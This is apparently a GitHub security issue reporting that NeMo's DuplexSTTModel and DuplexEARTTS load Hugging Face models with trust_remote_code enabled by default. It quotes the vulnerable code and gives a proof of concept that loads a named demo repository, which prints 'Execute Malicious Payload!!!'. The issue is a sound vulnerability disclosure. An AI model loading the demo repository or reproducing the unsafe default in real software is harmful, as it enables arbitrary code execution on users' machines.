Skip to content

Potential remote code execution via unsafe default trust_remote_code=True in DuplexSTTModel and DuplexEARTTS #15599

@Vancir

Description

@Vancir

Description

The NVIDIA NeMo library contains a remote code execution vulnerability in multiple model classes, including DuplexSTTModel and DuplexEARTTS. These classes load external Hugging Face models and tokenizers with trust_remote_code=True enabled by default, which allows execution of arbitrary code from remote repositories without requiring explicit user consent.

In DuplexSTTModel, the issue occurs when loading the pretrained language model through load_pretrained_hf. The trust_remote_code parameter is derived from configuration using self.cfg.get("trust_remote_code", True), meaning that if the user does not explicitly provide this field, it defaults to True. This results in automatic execution of remote code when loading models from external repositories.

A similar issue exists in DuplexEARTTS, where both the tokenizer and language model are initialized with trust_remote_code=True hardcoded. This forces remote code execution regardless of user intent or configuration, effectively bypassing the expected security boundary.

Root Cause

In DuplexSTTModel:

# Load LLM first
llm = load_pretrained_hf(
self.cfg.pretrained_llm,
pretrained_weights=self.cfg.pretrained_weights,
trust_remote_code=self.cfg.get("trust_remote_code", True),
).train()

Here, trust_remote_code defaults to True when not explicitly specified.

In DuplexEARTTS:

# Load tokenizer
self.tokenizer = AutoTokenizer(
self.cfg.pretrained_lm_name,
use_fast=True,
trust_remote_code=True,
bos_token=self.cfg.get("bos_token", None),
eos_token=self.cfg.get("eos_token", None),
pad_token=self.cfg.get("pad_token", None),
) # Note that we are using fast tokenizer

and:

def _load_language_model(self, cfg):
"""Load language model for RVQ-EAR-TTS."""
if cfg.pretrained_lm_name:
language_model = load_pretrained_hf(
self.cfg.pretrained_lm_name, pretrained_weights=True, trust_remote_code=True
).eval()

Proof of Concept

Take DuplexSTTModel as an example, I created an example model repository on Huggingface Hub for demonstration: XManFromXlab/nemo-DuplexSTTModel-RCE

A victim runs the following code (refer to the test_duplex_stt.py):

from nemo.collections.speechlm2 import DuplexSTTModel

model_id = "XManFromXlab/nemo-DuplexSTTModel-RCE"
cfg = {
    "pretrained_llm": model_id,
    "pretrained_weights": False,
    "audio_loss_weight": 1,
    "text_loss_weight": 3,
    "source_sample_rate": 16000,
    "validation_save_path": "/tmp/test_duplex_stt_logs",
    "perception": {
        "_target_": "nemo.collections.speechlm2.modules.perception.AudioPerceptionModule",
        "preprocessor": {
            "_target_": "nemo.collections.asr.modules.AudioToMelSpectrogramPreprocessor",
            "features": 80,
        },
        "encoder": {
            "_target_": "nemo.collections.asr.modules.ConformerEncoder",
            "feat_in": 80,
            "d_model": 512,
            "n_heads": 8,
            "n_layers": 1,
            "subsampling_factor": 8,
        },
        "modality_adapter": {
            "_target_": "nemo.collections.speechlm2.modules.perception.IdentityConnector",
            "d_model": 512,
        },
        "output_dim": 2048,
    },
    "optimizer": {"_target_": "torch.optim.AdamW"},
}

model = DuplexSTTModel(cfg)

In this example, it will print the following warning messages:

Execute Malicious Payload!!!
Execute Malicious Payload!!!
Execute Malicious Payload!!!

Metadata

Metadata

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions